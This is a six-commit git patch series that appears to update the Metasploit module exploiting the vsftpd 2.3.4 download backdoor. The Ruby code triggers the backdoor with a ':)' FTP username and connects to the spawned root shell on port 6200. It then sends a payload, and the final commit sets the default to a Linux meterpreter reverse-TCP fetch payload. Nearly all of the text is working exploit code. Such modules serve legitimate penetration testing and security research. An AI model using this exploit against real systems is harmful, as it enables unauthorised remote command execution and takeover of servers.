From 037826daf5fa0b589ee6a90aa97a41214c7c7652 Mon Sep 17 00:00:00 2001 From: g0t mi1k Date: Tue, 10 Feb 2026 16:54:06 +0000 Subject: [PATCH 1/6] vsftpd_234_backdoor: Add check --- .../exploits/unix/ftp/vsftpd_234_backdoor.rb | 39 +++++++++++++++++++ 1 file changed, 39 insertions(+) diff --git a/modules/exploits/unix/ftp/vsftpd_234_backdoor.rb b/modules/exploits/unix/ftp/vsftpd_234_backdoor.rb index 70b3b03de1..82bde1d912 100644 --- a/modules/exploits/unix/ftp/vsftpd_234_backdoor.rb +++ b/modules/exploits/unix/ftp/vsftpd_234_backdoor.rb @@ -56,6 +56,45 @@ class MetasploitModule < Msf::Exploit::Remote register_options([ Opt::RPORT(21) ]) end + def check + # Check for backdoor first, else exploit will fail + vprint_status("Checking if backdoor has already been triggered (else exploit will fail)") + nsock = self.connect(false, { 'RPORT' => 6200 }) rescue nil + if nsock + print_error("The port used by the backdoor bind listener is already open/in-use (6200/TCP)") + return Exploit::CheckCode::Unknown + end + + vprint_status("Connecting to FTP service") + connect + + vprint_status("Checking FTP banner") + banner = sock.get_once(-1, 30).to_s + + if banner.downcase.include?("vsftpd 2.3.4") + print_status("FTP banner hints its vulnerable: #{banner.strip}") + else + vprint_status("FTP banner: #{banner.strip}") + end + + ftp_user = rand_text_alphanumeric(rand(6) + 1) + vprint_status("Trying to log into FTP (User: #{ftp_user})") + sock.put("USER #{ftp_user}\r\n") + resp = sock.get_once(-1, 30).to_s + if resp =~ /^530 / + print_error("This server is configured for anonymous only and the backdoor code cannot be reached") + return Exploit::CheckCode::Safe + end + + if resp !~ /^331 / + print_error("This server did not respond as expected: #{resp.strip}") + return Exploit::CheckCode::Unknown + end + + return Exploit::CheckCode::Appears if banner.downcase.include?("vsftpd 2.3.4") and resp =~ /^331 / + return Exploit::CheckCode::Unknown + end + def exploit nsock = self.connect(false, { 'RPORT' => 6200 }) rescue nil if nsock From 7161c2cbe6c255194eee4ddfffdd43bf80479085 Mon Sep 17 00:00:00 2001 From: g0t mi1k Date: Tue, 10 Feb 2026 16:56:46 +0000 Subject: [PATCH 2/6] vsftpd_234_backdoor: Checks & raises for exploit --- .../exploits/unix/ftp/vsftpd_234_backdoor.rb | 19 +++++++++++++++---- 1 file changed, 15 insertions(+), 4 deletions(-) diff --git a/modules/exploits/unix/ftp/vsftpd_234_backdoor.rb b/modules/exploits/unix/ftp/vsftpd_234_backdoor.rb index 82bde1d912..96f714f05b 100644 --- a/modules/exploits/unix/ftp/vsftpd_234_backdoor.rb +++ b/modules/exploits/unix/ftp/vsftpd_234_backdoor.rb @@ -96,11 +96,22 @@ class MetasploitModule < Msf::Exploit::Remote end def exploit + framework.sessions.each do |sid, sess| + next unless sess.via_exploit + if sess.via_exploit == fullname + vprint_error("Session #{sid} is already connected to the backdoor") + end + end + nsock = self.connect(false, { 'RPORT' => 6200 }) rescue nil if nsock - print_status("The port used by the backdoor bind listener is already open") - handle_backdoor(nsock) - return + print_warning("The port used by the backdoor bind listener is already open. Trying...") + begin + handle_backdoor(nsock) + rescue + vprint_error("Someone has beat us to it, the backdoor is already in-use!") + raise Msf::Exploit::Failed, "Backdoor already in-use" + end end # Connect to the FTP service port first @@ -145,7 +156,7 @@ class MetasploitModule < Msf::Exploit::Remote if r !~ /uid=/ print_error("The service on port 6200 does not appear to be a shell") disconnect(s) - return + raise Msf::Exploit::Failed, 'Could not connect to backdoor' end print_good("UID: #{r.strip}") From dc2ec5ef39a94baf8040642aabf82a705f7878f2 Mon Sep 17 00:00:00 2001 From: g0t mi1k Date: Tue, 10 Feb 2026 16:58:20 +0000 Subject: [PATCH 3/6] vsftpd_234_backdoor: Be more verbose --- .../exploits/unix/ftp/vsftpd_234_backdoor.rb | 24 +++++++++++++------ 1 file changed, 17 insertions(+), 7 deletions(-) diff --git a/modules/exploits/unix/ftp/vsftpd_234_backdoor.rb b/modules/exploits/unix/ftp/vsftpd_234_backdoor.rb index 96f714f05b..7b7a36650a 100644 --- a/modules/exploits/unix/ftp/vsftpd_234_backdoor.rb +++ b/modules/exploits/unix/ftp/vsftpd_234_backdoor.rb @@ -115,14 +115,18 @@ class MetasploitModule < Msf::Exploit::Remote end # Connect to the FTP service port first + vprint_status("Connecting to FTP service") connect + vprint_status("Checking FTP banner") banner = sock.get_once(-1, 30).to_s - print_status("Banner: #{banner.strip}") + vprint_status("FTP banner: #{banner.strip}") - sock.put("USER #{rand_text_alphanumeric(rand(6) + 1)}:)\r\n") + ftp_user = "#{rand_text_alphanumeric(rand(6) + 1)}:)" + vprint_status("Trying to log into FTP via backdoor. User: #{ftp_user}") + sock.put("USER #{ftp_user}\r\n") resp = sock.get_once(-1, 30).to_s - print_status("USER: #{resp.strip}") + vprint_status(resp.strip) if resp =~ /^530 / print_error("This server is configured for anonymous only and the backdoor code cannot be reached") @@ -136,30 +140,36 @@ class MetasploitModule < Msf::Exploit::Remote return end - sock.put("PASS #{rand_text_alphanumeric(rand(6) + 1)}\r\n") + ftp_pass = "#{rand_text_alphanumeric(rand(6) + 1)}" + vprint_status("Trying to log into FTP via backdoor. Password: #{ftp_pass}") + sock.put("PASS #{ftp_pass}\r\n") # Do not bother reading the response from password, just try the backdoor + vprint_status("Connecting to backdoor on 6200/TCP") nsock = self.connect(false, { 'RPORT' => 6200 }) rescue nil if nsock - print_good("Backdoor service has been spawned, handling...") + print_good("Backdoor has been spawned!") handle_backdoor(nsock) return + else + print_warning("Unable to connect to backdoor on 6200/TCP. Cooldown?") end disconnect end def handle_backdoor(s) + vprint_status("Trying 'id' command") s.put("id\n") r = s.get_once(-1, 5).to_s if r !~ /uid=/ - print_error("The service on port 6200 does not appear to be a shell") + print_error("The service on port 6200/TCP does not appear to be a fresh shell. Already exploited?") disconnect(s) raise Msf::Exploit::Failed, 'Could not connect to backdoor' end - print_good("UID: #{r.strip}") + vprint_good("UID: #{r.strip}") s.put("nohup " + payload.encoded + " >/dev/null 2>&1") handler(s) From 5c29007f8532bf84a8df98737a6b0284ec20831c Mon Sep 17 00:00:00 2001 From: g0t mi1k Date: Tue, 10 Feb 2026 16:58:38 +0000 Subject: [PATCH 4/6] vsftpd_234_backdoor: Add comments --- modules/exploits/unix/ftp/vsftpd_234_backdoor.rb | 10 ++++++++-- 1 file changed, 8 insertions(+), 2 deletions(-) diff --git a/modules/exploits/unix/ftp/vsftpd_234_backdoor.rb b/modules/exploits/unix/ftp/vsftpd_234_backdoor.rb index 7b7a36650a..3ebee7373e 100644 --- a/modules/exploits/unix/ftp/vsftpd_234_backdoor.rb +++ b/modules/exploits/unix/ftp/vsftpd_234_backdoor.rb @@ -14,7 +14,7 @@ class MetasploitModule < Msf::Exploit::Remote info, 'Name' => 'VSFTPD v2.3.4 Backdoor Command Execution', 'Description' => %q{ - This module exploits a malicious backdoor that was added to the VSFTPD download + This module exploits a malicious backdoor that was added to the VSFTPD download archive. This backdoor was introduced into the vsftpd-2.3.4.tar.gz archive between June 30th 2011 and July 1st 2011 according to the most recent information available. This backdoor was removed on July 3rd 2011. @@ -96,6 +96,7 @@ class MetasploitModule < Msf::Exploit::Remote end def exploit + # Check for backdoor first, else exploit will fail framework.sessions.each do |sid, sess| next unless sess.via_exploit if sess.via_exploit == fullname @@ -105,6 +106,7 @@ class MetasploitModule < Msf::Exploit::Remote nsock = self.connect(false, { 'RPORT' => 6200 }) rescue nil if nsock + # Chance are, we will fail, but doesn't hurt to try print_warning("The port used by the backdoor bind listener is already open. Trying...") begin handle_backdoor(nsock) @@ -114,10 +116,11 @@ class MetasploitModule < Msf::Exploit::Remote end end - # Connect to the FTP service port first + # Now connect to the FTP service vprint_status("Connecting to FTP service") connect + # Without this, 220 response, rather than 331 vprint_status("Checking FTP banner") banner = sock.get_once(-1, 30).to_s vprint_status("FTP banner: #{banner.strip}") @@ -155,6 +158,7 @@ class MetasploitModule < Msf::Exploit::Remote print_warning("Unable to connect to backdoor on 6200/TCP. Cooldown?") end + # Finished with FTP disconnect end @@ -162,9 +166,11 @@ class MetasploitModule < Msf::Exploit::Remote vprint_status("Trying 'id' command") s.put("id\n") + # Wait 5 seconds and get everything r = s.get_once(-1, 5).to_s if r !~ /uid=/ print_error("The service on port 6200/TCP does not appear to be a fresh shell. Already exploited?") + # Finished with the backdoor disconnect(s) raise Msf::Exploit::Failed, 'Could not connect to backdoor' end From 53ac84be038f4ce47413de5d00af450e523cd101 Mon Sep 17 00:00:00 2001 From: g0t mi1k Date: Fri, 20 Feb 2026 08:08:55 +0000 Subject: [PATCH 5/6] vsftpd_234_backdoor: Reconfig default target --- .../exploits/unix/ftp/vsftpd_234_backdoor.rb | 32 ++++++++++++++----- 1 file changed, 24 insertions(+), 8 deletions(-) diff --git a/modules/exploits/unix/ftp/vsftpd_234_backdoor.rb b/modules/exploits/unix/ftp/vsftpd_234_backdoor.rb index 3ebee7373e..8877a21890 100644 --- a/modules/exploits/unix/ftp/vsftpd_234_backdoor.rb +++ b/modules/exploits/unix/ftp/vsftpd_234_backdoor.rb @@ -33,15 +33,24 @@ class MetasploitModule < Msf::Exploit::Remote 'Payload' => { 'Space' => 2000, 'BadChars' => '', - 'DisableNops' => true, - 'Compat' => - { - 'PayloadType' => 'cmd_interact', - 'ConnectionType' => 'find' - } + 'DisableNops' => true }, 'Targets' => [ - [ 'Automatic', {} ], + [ + 'Backdoor Shell', + { + 'Type' => :unix_cmd, + 'DefaultOptions' => { + 'PAYLOAD' => 'cmd/unix/interact' + }, + 'Payload' => { + 'Compat' => { + 'PayloadType' => 'cmd_interact', + 'ConnectionType' => 'find', + } + } + } + ] ], 'DisclosureDate' => '2011-07-03', 'DefaultTarget' => 0, @@ -177,7 +186,14 @@ class MetasploitModule < Msf::Exploit::Remote vprint_good("UID: #{r.strip}") - s.put("nohup " + payload.encoded + " >/dev/null 2>&1") + unless payload.encoded.empty? + c = "" + c << payload.encoded + c << "\n" + vprint_status("Running: #{c.strip}") + s.put(c) + end + handler(s) end end From bc81140d4f04d0a2cfa96165902b100d944d7bbc Mon Sep 17 00:00:00 2001 From: g0t mi1k Date: Fri, 20 Feb 2026 08:27:06 +0000 Subject: [PATCH 6/6] vsftpd_234_backdoor: Add Linux fetch payload support Fetch over CmdStager (& multiple targets) --- modules/exploits/unix/ftp/vsftpd_234_backdoor.rb | 13 ++++--------- 1 file changed, 4 insertions(+), 9 deletions(-) diff --git a/modules/exploits/unix/ftp/vsftpd_234_backdoor.rb b/modules/exploits/unix/ftp/vsftpd_234_backdoor.rb index 8877a21890..0458f2c37a 100644 --- a/modules/exploits/unix/ftp/vsftpd_234_backdoor.rb +++ b/modules/exploits/unix/ftp/vsftpd_234_backdoor.rb @@ -28,7 +28,7 @@ class MetasploitModule < Msf::Exploit::Remote [ 'URL', 'http://scarybeastsecurity.blogspot.com/2011/07/alert-vsftpd-download-backdoored.html' ], ], 'Privileged' => true, - 'Platform' => [ 'unix' ], + 'Platform' => [ 'unix', 'linux' ], 'Arch' => ARCH_CMD, 'Payload' => { 'Space' => 2000, @@ -37,17 +37,12 @@ class MetasploitModule < Msf::Exploit::Remote }, 'Targets' => [ [ - 'Backdoor Shell', + 'Linux/Unix Command', { 'Type' => :unix_cmd, 'DefaultOptions' => { - 'PAYLOAD' => 'cmd/unix/interact' - }, - 'Payload' => { - 'Compat' => { - 'PayloadType' => 'cmd_interact', - 'ConnectionType' => 'find', - } + # This exploit also supports direct interaction with the backdoor using cmd/unix/interact payload + 'PAYLOAD' => 'cmd/linux/http/x86/meterpreter_reverse_tcp' } } ]